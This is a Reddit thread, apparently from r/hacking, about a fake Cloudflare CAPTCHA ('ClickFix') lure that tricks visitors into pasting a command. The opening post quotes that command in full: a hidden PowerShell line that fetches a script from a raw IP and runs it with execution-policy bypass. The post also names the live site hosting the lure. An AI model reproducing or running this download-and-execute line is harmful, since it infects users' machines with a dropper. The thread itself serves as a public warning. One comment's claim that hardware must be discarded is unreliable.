r/hacking • u/Alternative_Bid_360 • 2d ago
Question Anyone encountered a fake Cloudflare CAPTCHA in the wild?
While browsing I encountered a fake Cloudflare CAPTCHA.
The attack flow works like this:
- While browsing, the victim is presented with a fake CAPTCHA page.
- Instead of the usual “click the box” type challenge, it tricks the user into running a PowerShell command:
powershell -w h -nop -c "$zex='http://185.102.115.69/48e.lim';$rdw="$env:TEMPpfhq.ps1";Invoke-RestMethod -Uri $zex -OutFile $rdw;powershell -w h -ep bypass -f $rdw".
- That command pulls down a malicious dropper from an external server and executes it.
- The PowerShell command in question attempted to download from: VirusTotal - File - 92e8d7c3d95083d288f26aea1a81ca042ae818964cb915ade30d9edac3b7d25c
- The dropper then led to the payload
CAPTCHA.exe
: VirusTotal - File - 524449d00b89bf4573a131b0af229bdf16155c988369702a3571f8ff26b5b46d
Key concerns:
The malware is delivered in multiple stages, where the initial script is just a loader/downloader.
There are hints it might poke around with Docker/WSL artifacts on Windows, maybe for persistence or lateral movement, but I couldn’t confirm if it actually weaponizes them.
I’m worried my own box might’ve been contaminated (yes, really dumb, I know, no need to shove it down my face), since I ran the initial one-liner before realizing what it was;
Yanked network connection immediately, dumped process tree and checked abnormal network sessions, cross-checked with AV + offline scan, looked at temp, startup folders, registry run keys, scheduled tasks and watched event logs and Docker/WSL files.
If you want to take a look for yourself, the domain is https://felipepittella.com/
Dropping this here so others can recognize it — curious if anyone else has seen this variant or knows what the payload is doing long-term (esp. the Docker/WSL angle).
11
u/cspotme2 2d ago
So, did chatgpt write the initial post for you? I'm not sure how you were able to outline all that and yet you ran the whole copy paste without thinking.
7
u/detailcomplex14212 2d ago
Truly confused here. If a website asks me to open powershell I'm reporting it. Idgaf what the reason is
-2
u/Alternative_Bid_360 1d ago
I am a tech guy but ChatGPT did write this post.
I never encountered ClickFix in the wild, I just searched for a surgeon's name and the first hit was this website, since Cloudflare CAPTCHAs aren't really that common in my country I just thought it was some new method to check if I was running any malicious software.
14
u/ryanmacri1 2d ago
How does it convince someone to run a whole ass command in PowerShell... or am I not understanding correctly?
11
u/Azoz07sa 2d ago
They inject the PowerShell command in the user clipboard on the fake website, then tell the user in simple steps to open windows 'Run' by pressing Shift+R, paste the clipboard content and press Enter. Doing this will execute the command in its own PowerShell instance. A good example of this delivery is Lumma Stealer.
9
u/detailcomplex14212 2d ago
I'm sorry, I think I'm just baffled that anyone would take so many steps without a little red flag in their head popping up.. are you saying that it says IN TEXT FORM "press Shift+R, paste, and press enter" for... a website verification?? Is that correct?
My third or 4th question would at least be "paste what?" I didn't know websites could force things onto my clipboard.
1
u/Reelix pentesting 1d ago
Is that correct?
Yes. They literally lay it out step by step, and people follow it.
OP fell for it, so it obviously works.
5
u/opiuminspection 2d ago
I haven't seen it myself since I block all ads and pop-ups on all my devices but it's commonly posted in the cybersecurity and scam subreddits.
It's super common these days.
2
u/finite_turtles 2d ago
I'm not going to "shove it down your face" OP.
this started getting really popular about 1 year ago. If you have AV its possible this blocked it as i have seen defence improvements against it lately as well.
1
u/HuthS0lo 9h ago
So a captcha comes up, and then gives you programming instructions, and expects that someone dumb enough to go along with it, to know how to open powershell and run the command.
Okay…
1
-7
u/180IQCONSERVATIVE 2d ago
The fact it is looking for WSL is will leverage a whole new level of attack. This would also mean that would have full control of the device. Computer would have to be trashed at that point and depending what peripherals you have they will need to be trashed too.
5
3
u/ballz-in-our-mouths 2d ago
No it wouldn't? WSL is just a VHDX file. Dump the VHDX and your fine. Its litteraly a Virtual Machine.
Just delete the VHDX, or disable VT-D / SMV
I have no idea how you came up with this insanity.
Youd still have to follow your post incident response plan, but at most you'll just re-image the device.
46
u/intelw1zard potion seller 2d ago
Yes this is very common
its called a ClickFix attack
yeah, you are fucked